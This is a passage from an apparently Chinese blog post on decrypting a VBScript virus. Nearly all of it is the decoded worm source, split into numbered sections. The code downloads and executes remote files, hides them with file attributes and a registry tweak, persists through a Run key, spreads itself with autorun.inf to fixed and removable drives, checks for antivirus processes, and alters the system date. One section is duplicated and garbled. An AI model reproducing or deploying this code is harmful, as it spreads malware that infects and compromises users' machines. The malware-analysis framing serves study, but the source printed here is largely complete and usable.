ini.writeline adv
ini.close
shuxing mulu&infname,1+2+4
end function

第六段：

引用:

function readtxt(where,line)
if fso.fileexists(where) then
set readfile = fso.opentextfile(where, 1)
i=0
do while i<line
i=i+1
strline = readfile.readline
loop
readfile.close
readtxt=strline
else
readtxt="not_found"
end if
end function

第七段：

引用:

function shuxing(file,change)
if fso.fileexists(file) then
set ofile = fso.getfile(file)
ofile.attributes = change
set ofile = nothing
end if
if fso.folderexists(file) then
set ofile = fso.getfolder(file)
ofile.attributes = change
set ofile = nothing
end if
end function

第八段:

引用:

function advdownfile(localfile,urlfile,runfile,cishu,minsize)
test=0
do while test<cishu
shuxing localfile,0
ilocal = lcase(localfile):iremote = lcase(urlfile):
'if 1=2 then wscript.echo "impossible!"
set xpost = createobject("microsoft.xmlhttp")
'if 1=2 then wscript.echo "impossible!"
xpost.open "get",iremote,0
'if 1=2 then wscript.echo "impossible!"
on error resume next
xpost.send()
if not er then
'if 1=2 then wscript.echo "impossible!"
set sget = createobject("adodb.stream")
'if 1=2 then wscript.echo "impossible!"
sget.mode = 3
'if 1=2 then wscript.echo "impossible!"
sget.type = 1
'if 1=2 then wscript.echo "impossible!"
sget.open()
'if 1=2 then wscript.echo "impossible!"
sget.write(xpost.responsebody)
'if 1=2 then wscript.echo "impossible!"
sget.savetofile ilocal,2
'if 1=2 then wscript.echo "impossible!"
shuxing localfile,2+4
if fso.fileexists(localfile) then
filesize=fso.getfile(localfile).size
else
filesize=0
end if
if filesize>minsize then
if runfile=1 then wsh.run localfile
exit do
end if
else
test=test+1
delfile localfile
wscript.sleep 3000
end if
loop
end function

第九段：没有加密

引用:

function er()
if err.number = 0 then
er = false
else
err.clear
er = true
end if
end function

第十段：即解密函数本身

引用:

function uc(b)
c=vbCrLf:Execute("For i=1 To Len(b):a=Asc(Mid(b,i,1))"&c&"If a=125 Then a=13"&c&"If a=123 Then a=10"&c&"if a=124 Then a=34"&c&"if a>96 and a<110 then"&c&"a=a+13"&c&"elseif a>109 and a<123 then"&c&"a=a-13"&c&"End If"&c&"uc=uc+chr(a)"&c&"Next"):intercept(uc):end function

第十一段：没有加密

引用:

function ucc(b)
msgbox("holle hacker")
end function

第十二段：

引用:

for each d in dc
if mulu=d&"/" then opendisk=wsh.run("explorer "&d,3,false)
next
if not sys then
wscript.sleep 5000
if jincheng("wscript.exe",2)=1 and readtxt(dir&"/date.bin",1)= trim(date) then wscript.quit
if jincheng("wscript.exe",2)<>1 and jincheng("wscript.exe",2) then wscript.quit
end if
if readtxt(mulu&ouwnname,1)<>"'"&ver then
chengfa
end if
if sys then
yincang
if readtxt(mulu&infname,1)<>tile then
buildinf ver,0,0,0
end if
lexe=readtxt(mulu&infname,5)
if fso.fileexists(exemulu&lexe) then
wsh.run exemulu&lexe
end if
if readtxt(dir&"/"&filename&".vbe",1)<>"'"&ver then
copyvbs dir&"/"&filename&".vbe"
zhuce
end if
if readtxt(win&"/"&filename&".vbe",1)<>"'"&ver then
copyvbs win&"/"&filename&".vbe"
end if
if readtxt(wbem&filename&".vbe",1)<>"'"&ver and readtxt(mulu&infname,11)=1 then
buildfile wbem&filename&".vbe",ucc(O1+O2)
end if
if readtxt(mulu&infname,11)=2 then
for each d in dc
if d.drivetype = 2 then
if fso.fileexists(d&"/autorun.inf") then
delfile d&"/autorun.inf"
end if
if not fso.folderexists(d&"/autorun.inf") then
buildfold d&"/autorun.inf"
shuxing d&"/autorun.inf",1+2+4
end if
end if
next
end if
if jincheng("avp.exe",1) then
k=1
elseif jincheng("kwatch.exe",1) then
k=2
elseif jincheng("ccenter.exe",1) then
k=3
else
k=4
end if
t = day(date) mod 3
if (k=1 and t=1) or (k=2 and t=2) or (k=3 and t=2) or (k=4 and t=0) then
else
buildfile dir&"/date.bin",date
end if

ganran
wsh.run mulu&ouwnname
else
shuxing mulu&ouwnname,2+4
copyvbs dir&"/"&filename&".vbe"
copyvbs win&"/"&filename&".vbe"
zhuce
wsh.run dir&"/"&filename&".vbe"
end if

第十三段：

引用:

function jincheng(where,geshu)
on error resume next
set y=getobject("winmgmts://./root/cimv2")
set x=y.execquery("select * from win32_process where name='"&where&"'")
i=1
for each j in x
i=i+1
next
if not er then
if i>geshu then jincheng = true
else
jincheng = 1
end if
end function

第十四段：好几个函数没加密，归在一起

引用:

function copyfile(file,where)
delfile where
if fso.fileexists(file) then
fso.copyfile file,where,true
end if
end function

function copyvbs(where)
delfile where
set self=fso.opentextfile(mulu&ouwnname,1)
vbscopy=self.readall
self.close
set vbs = fso.createtextfile(where, true)
vbs.write vbscopy
vbs.close
shuxing where,2+4
end function

function zhuce()
RegPath="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/Curren tVersion/policies/Explorer/run/"
Type_Name="REG_SZ"
Key_Name="explorer"
Key_Data=filename&".vbe"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function

function yincang()
RegPath="HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced/"
Type_Name="REG_DWORD"
Key_Name="ShowSuperHidden"
Key_Data="00000000"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function

function buildfold(path)
if fso.folderexists(path) then
exit function
end if
if not fso.folderexists(fso.getparentfoldername(path)) then
buildfold fso.getparentfoldername(path)
end if
fso.createfolder(path)
end function

第十五段：

引用:

function dowork(pcs,fname,furl,time)
on error resume next
set y=getobject("winmgmts://./root/cimv2")
set x=y.execquery("select * from win32_process where name='"&where&"'")
i=1
for each j in x
i=i+1
next
if not er then
if i>geshu then jincheng = true
else
jincheng = 1
end if
end function

第十六段：

引用:

function dowork(pcs,fname,furl,time)
if not fso.fileexists(exemulu&fname) and jincheng(pcs,1) then
advdownfile exemulu&fname,"http://"&furl,0,2,3000
end if
if fso.fileexists(exemulu&fname) then
if time<>0 then
nowdate=date
wsh.run "%comspec% /c date 2002-"&month(date)&"-"&day(date),vbhide
wscript.sleep abs(time*1000)
end if
wsh.run exemulu&fname
dowork=1
if time>0 then
wscript.sleep 5000
wsh.run "%comspec% /c date "&nowdate,vbhide
end if
end if
end function

第十七段：

引用:

function ganran()
do
for each d in dc
if d.drivetype = 3 or (d.drivetype = 1 and d<>"A:" and d<> "B:") then
if fso.folderexists(d&"/autorun.inf") then
delfile d&"/autorun.inf"
end if
if fso.fileexists(d&"/"&filename&".vbs") and fso.fileexists(d&"/autorun.inf") then
if readtxt(d&"/autorun.inf",1)<>tile then
copyfile dir&"/"&infname,d&"/autorun.inf"
copyfile win&"/"&filename&".vbe",d&"/"&filename&".vbs"
end if
else
yincang
copyfile dir&"/"&infname,d&"/autorun.inf"
copyfile win&"/"&filename&".vbe",d&"/"&filename&".vbs"
end if
end if
next
if (minute(now) mod 2)=0 and rw<>-1 then
gettask
end if
wscript.sleep 3000
loop
end function

第十八段：

引用:

function chengfa()
msgbox("hello,hacker!")
delfile mulu&ouwnname
wscript.quit
end function

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
VBS病毒解密初探

1。加密的VBS病毒：引用:0.1aa="(( 5.6}{=|5.6|}{=||}{=|.|}{=|K O V|& }{=|F W 65.65|}{=(659)&(661)&(661)&(667)&|://|&(30)&|.|
复制链接

扫一扫

专栏目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。